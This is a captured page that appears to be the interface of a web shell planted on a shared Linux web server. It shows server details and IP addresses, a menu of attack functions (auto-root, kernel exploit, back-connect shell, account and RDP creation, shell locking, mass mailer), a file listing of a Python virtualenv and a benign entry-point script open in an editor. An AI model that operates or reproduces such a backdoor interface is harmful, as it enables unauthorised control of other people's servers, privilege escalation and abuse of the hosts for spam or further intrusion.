Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
bin /
dhwp /
env /
bin /
[ HOME SHELL ]
Name
Size
Permission
Action
activate
2.11
KB
-rw-r--r--
activate.csh
1.42
KB
-rw-r--r--
activate.fish
2.97
KB
-rw-r--r--
activate.nu
1.27
KB
-rw-r--r--
activate.ps1
1.73
KB
-rw-r--r--
activate_this.py
1.17
KB
-rw-r--r--
cement
232
B
-rwxr-xr-x
deactivate.nu
333
B
-rw-r--r--
dhwp
940
B
-rwxr-xr-x
normalizer
244
B
-rwxr-xr-x
pip
239
B
-rwxr-xr-x
pip-3.10
239
B
-rwxr-xr-x
pip3
239
B
-rwxr-xr-x
pip3.10
239
B
-rwxr-xr-x
python
5.66
MB
-rwxr-xr-x
python3
5.66
MB
-rwxr-xr-x
python3.10
5.66
MB
-rwxr-xr-x
wheel
226
B
-rwxr-xr-x
wheel-3.10
226
B
-rwxr-xr-x
wheel3
226
B
-rwxr-xr-x
wheel3.10
226
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : dhwp
#!/usr/local/bin/dhwp/env/bin/python # EASY-INSTALL-ENTRY-SCRIPT: 'dhwp','console_scripts','dhwp' import re import sys # for compatibility with easy_install; see #2198 __requires__ = 'dhwp' try: from importlib.metadata import distribution except ImportError: try: from importlib_metadata import distribution except ImportError: from pkg_resources import load_entry_point def importlib_load_entry_point(spec, group, name): dist_name, _, _ = spec.partition('==') matches = ( entry_point for entry_point in distribution(dist_name).entry_points if entry_point.group == group and entry_point.name == name ) return next(matches).load() globals().setdefault('load_entry_point', importlib_load_entry_point) if __name__ == '__main__': sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0]) sys.exit(load_entry_point('dhwp', 'console_scripts', 'dhwp')())
Close